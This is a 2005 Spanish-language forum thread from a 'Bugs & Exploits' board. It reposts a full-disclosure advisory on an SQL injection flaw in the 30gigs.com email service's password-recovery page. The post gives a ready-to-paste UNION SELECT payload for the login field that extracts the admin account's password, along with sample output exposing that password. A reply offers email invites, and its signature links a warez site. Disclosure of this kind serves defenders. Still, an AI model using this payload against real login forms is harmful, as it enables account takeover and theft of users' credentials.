Viernes, 09 de Enero del 2009

Tagline gratis de hoy: Capítulo 12 => Ecología: Cómo deshacerse de Windows sin contaminar

 
Inicio Descargas Foros Tu Cuenta Web Links  
Crear Una Cuenta
Menú Principal
Inicio (Noticias):
 Inicio
 Enviar Noticia
 Mapa de Noticias
 Noticias en Tu Web
 Noticias Destacadas
 Archivo de Noticias
 Búscar
 Topicos
Miembros:
 Lista de Usuarios
 Tu Cuenta
 Diario de Usuarios
 Mensaje Privados
 Comunidad:
 Foros de Aclantis
 Recetas de Cocina Gratis
 Juegos Gratis
 AvantGo de Descargas
 Buscar en Google
 Webs Amigas
 Bromas y Chistes
 Trucos de Juegos
 Trucos de Informática
 Guías y Análisis de Juegos
 Publicidad y Intercambios
 Referirnos
 Contáctenos
  Web Links
 
  Descargas
 
Estadísticas:
 Estadísticas
 Site Map
 Top 20
 Encuestas
Documentaciones:
 Artículos
 Agregar a Favoritos
 Herramientas WebMasters
 FAQ De Aclantis
Recomendados


Noticias recientes
Miércoles, 07 enero
· Firmas tecnológicas buscarán fusiones y compras seguras en 2009
· Cambios en la iTunes Store: Todas las canciones estarán libres de DRM
· Apple desvela iWork 09
· Motorola presenta el primer móvil fabricado con material reciclado de botellas
· Apple presenta iLife 09
· A través del móvil acosan a mujeres en el metro de México
· Decepción total en la última keynote de Apple
· Intel y Adobe ampliarán la plataforma Flash para TV
· Conoce los mejores campos de golf de la Riviera Maya
Martes, 06 enero
· Wii Sports se convierte en el juego más vendido de la historia

Artículos Viejos
Aclantis: Forums

Aclantis :: Ver tema - 30gigs SQL injection vulnerability
Login Registrarse FAQ Miembros Buscar

Foros de discusión -> Bugs & Exploits -> 30gigs SQL injection vulnerability
Publicar nuevo tema  Responder al tema Ver tema anterior :: Ver tema siguiente 
30gigs SQL injection vulnerability
MensajePublicado: Dom Nov 20, 2005 8:46 pm Responder citando
Merda
Junior, recien llegado
Junior, recien llegado
 
Registrado: Nov 11, 2005
Mensajes: 44




Pues eso, aqui lo tienen:

Cita:
I found a sql injection vulnerability, which leads to password disclosure in
30gigs.com <http://30gigs.com> email service.
The vulnerability exists in http://www.30gigs.com/getpassword/ page due to
lack of validation of user submitted data.
Proof of Concept:
enter http://www.30gigs.com/getpassword/
and copy & paster this code in the Login field, finally submit the form.


not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='admin


it will give an output like below, in which "runsit" corresponds to the
password of account "admin"
We have sent the password for your not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='admin_at_30gigs.com account to runsit


The site has been notified about the vulnerability 2 weeks ago, but no
response was taken.




Descubierto por: http://seclists.org/lists/fulldisclosure/2005/Nov/0523.html
Ver perfil de usuario Enviar mensaje privado
MensajePublicado: Dom Ene 01, 2006 5:22 pm Responder citando
Tor_victor_
Esqueleto, fiel a Aclantis.
Esqueleto, fiel a Aclantis.
 
Registrado: Jan 18, 2004
Mensajes: 1607
Ubicación: ..::En Mi Pc, o en el tuyo...::..




no poes lo tomare en cuenta para mi correo jeje tengo invitaciones para este mail asi ke el ke kiera mandanme un mp som 8 las ke tengo

_________________
img]http://img358.imageshack.us/img358/3313/firma2qi.jpg[/img]
www.Kozyowarez.com
Ver perfil de usuario Enviar mensaje privado Enviar email Visitar sitio web del autor Dirección AIM Yahoo Messenger MSN Messenger
30gigs SQL injection vulnerability
  Foros de discusión -> Bugs & Exploits
Puede publicar nuevos temas en este foro
No puede responder a temas en este foro
No puede editar sus mensajes en este foro
No puede borrar sus mensajes en este foro
No puede votar en encuestas en este foro
Todas las horas son GMT + 10 Horas  
Página 1 de 1  

  
  
 Publicar nuevo tema  Responder al tema  


Powered by phpBB © 2001-2003 phpBB Group
Theme created by Vjacheslav Trushkin
Forums ©
Theme Design By Aclantis Hosting    Powered By PHP-Nuke

ZaKaTRoN Caratulandia.net Aclantis AclantisAclantis Aclantis
AclantisAclantis AclantisAclantisAclantis Aclantis

Inicio | Top 20 | Articulos | Descargas | Noticias - © (2000 - 2008) - Aclantis by Draving - Contactanos 



[ Script generation time: 0.318s (PHP: 94% - SQL: 6%) ] - [ SQL queries: 23 ] - [ Pages served in past 5 minutes : 288 ] - [ GZIP disabled ] - [ Debug on ]